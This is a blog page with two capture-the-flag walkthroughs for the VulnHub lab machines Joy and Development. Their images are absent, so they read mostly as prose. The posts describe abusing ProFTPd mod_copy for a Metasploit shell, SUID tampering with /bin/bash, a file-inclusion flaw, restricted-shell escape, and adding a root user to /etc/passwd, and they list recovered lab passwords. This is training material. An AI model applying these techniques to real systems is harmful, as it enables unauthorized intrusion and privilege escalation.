AdSense

Showing posts with label CAPTURE THE FLAG - VULNERABLE MACHINES. Show all posts
Showing posts with label CAPTURE THE FLAG - VULNERABLE MACHINES. Show all posts

Saturday, November 13, 2021

Joy

 JOY

- Layout for this exercise:










1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Joy from the VulnHub pentesting platform.

Joy can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

- Once downloaded Joy and extracted with VMware:



2 - ENUMERATION

- netdiscover helps to identify Joy's IP 192.168.1.23:



- Scanning with Nmap:
















- Scanning deeper port 21 we discover Anonymous FTP server and two folders, download and upload:




























- download seems to be empty, however upload gives a lot of information:




























- Connecting to the FTP server:










- Going to upload:



- Getting directory:







- Reading directory there are a lof of files inside:

















- However let's focus our attention on the file version_control:



- At this moment the file is not accessible, so we need to copy it to the folder /upload ,what it's doable because it has read and write permissions.

- Using commands site cpfr and site cpto to copy version_control:

http://www.proftpd.org/docs/contrib/mod_copy.html














- Copying version_control to /upload has been successful:


































- Getting version_control:








3 - EXPLOITATION

- Reading the file we discover some potential vulnerabilities regarding ProFTPd version 1.3.5. Also the new webroot is /var/www/tryingharderisjoy:












- Msfconsole searchs for exploits:













- Setting option SITEPATH as the new webroot /var/www/tryingharderisjoy:













- So finally we have a remote shell.


4 - PRIVILEGE ESCALATION

- Browsing around some content:


- Inside folder ossec we find essential credentials:






- Switching to root does not work:






- However switching to patrick works, and this user has some sudoer privileges on the file test:











- Running test we are asked to change permissions to a file, for instance let's make /bin/bash executable with permission SUID bit set 4777:

https://www.slashroot.in/suid-and-sgid-linux-explained-examples



- Now, user patrick can run /bin/bash and get a root shell:







5 - CAPTURING THE FLAG

- Reading proof.txt:












Posted by at
Labels:

Friday, November 12, 2021

Development

DEVELOPMENT

- Layout for this exercise:














1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Development from the VulnHub pentesting platform.

- Development can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

- Once downloaded Development and extracted with Vmware:

















2 - ENUMERATION

- netdiscover helps to identify Development's IP 192.168.1.21:



















- This machine seems to have different potential solutions, however I will stick to the walkthrough that I have used to resolve it, mainly the web server at port 8080 and SSH service at port 22.

- Scanning with Nmap:

















- Scanning deeper port 8080:










































- Connecting to the web server at port 8080 we learn about html_pages:























- Browsing html_pages there is a Linux directory list:






















- Most of those web pages are just distractions of the hacking process, however development.html holds interesting information:






























- Viewing the source it seems that /developmentsecretpage is the right way to follow:
























- Connecting to /developmentsecretpage:


















- Clicking Patrick's:
































- Clicking Click here to log out we find a login form:

















3 - EXPLOITATION

- Trying any credentials the login works, for instance abcde:abcde:



















- The page shows a PHP error message about a deprecated function that leads to a vulnerability related to slogin_lib.inc.php:





































- Looking for a related exploit we find this File Disclosure/Remote File Inclusion:



























- Trying the exploit we find credentials for 4 users:













- Decrypting the hashes:



































- So the new credentials are:

intern:12345678900987654321
patrick:P@ssw0rd25
qiu:qiu


- After trying unsuccessfully SSH for patrick and qiu, the only account that works is intern:








































- However the shell is not working fine, because just some commands are allowed:













- Following this instructions we can improve the Lshell and get rid of the limitations:








4 - CAPTURING THE 1st FLAG

- Reading local.txt:








5 - PRIVILEGE ESCALATION

- User intern has no sudoer privileges:







- However user patrick's sudoer privileges allow him to use editors like vim and nano:



















- The strategy to achieve Privilege Escalation will be to edit /etc/passwd adding a line with root credentials for a new user.

- First, let's create the hash for the new user whitelist:qwerty:







- Inserting the corresponding line at the bottom of /etc/passwd:





- Finally, switching to user whitelist we have a root shell:









6 - CAPTURING THE 2nd FLAG

- Reading proof.txt:





















Posted by at
Labels:
Subscribe to: Posts (Atom)